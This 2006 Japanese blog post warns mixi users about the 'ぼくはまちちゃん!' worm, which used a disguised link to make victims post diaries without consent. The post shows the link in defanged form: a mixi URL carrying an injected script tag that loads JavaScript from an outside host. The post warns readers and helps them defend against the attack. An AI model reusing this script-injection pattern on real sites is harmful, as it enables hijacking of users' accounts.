« [WC便乗]We are the champ? | トップページ | Driving »

2006年6月18日 (日)

[mixi内緊急]『ぼくはまちちゃん!』

2005年4月頃に、「ぼくはまちちゃん!」のタイトルで、勝手に日記を書き込むjavascriptが一部マイミクさんの間に出回ってしまったようです。
参考記事2005年4月23日のITmediaから。
http://www.itmedia.co.jp/enterprise/articles/0504/23/news005.html

「ぼくはまちちゃん!」というタイトルの日記にあるリンクは絶対クリックなさらぬように。

−−−以下、引用
こんにちはこんにちは!!
↓そんなことより、これはひどい
ここにmixi内なのにありえない長さのリンクが貼られています。
−−−引用ここまで

マウスカーソルをリンクに当てると、下記の内容になっています。文字をコードで記入することで、javascriptを実行させることを見せなくしています。
(リンクされないように、一部全角化、[]化、"抜きにしています。)
http://mixi.jp/list_comment.pl?id=609805][script src=http://hamachiya.com/bh9.js/][/script][x・・・

リンクをクリックすると「このデータはありません」と出ますが、その裏でjavascriptは実行済みです。


「mixi内でもリンクを鵜呑みにしないこと」が大事なんですね。

|

« [WC便乗]We are the champ? | トップページ | Driving »

パソコン・インターネット」カテゴリの記事

コメント

コメントを書く



(ウェブ上には掲載しません)




トラックバック

この記事のトラックバックURL:
http://app.cocolog-nifty.com/t/trackback/52711/10572030

この記事へのトラックバック一覧です: [mixi内緊急]『ぼくはまちちゃん!』:

» mixi チェーン日記 ぼくはまちちゃん [気になる言葉ブログ]
SNS(ソーシャルネットワーキングサービス)のmixiで、 2006年6月19日... [続きを読む]

受信: 2006年6月22日 (木) 午後 04時19分

« [WC便乗]We are the champ? | トップページ | Driving »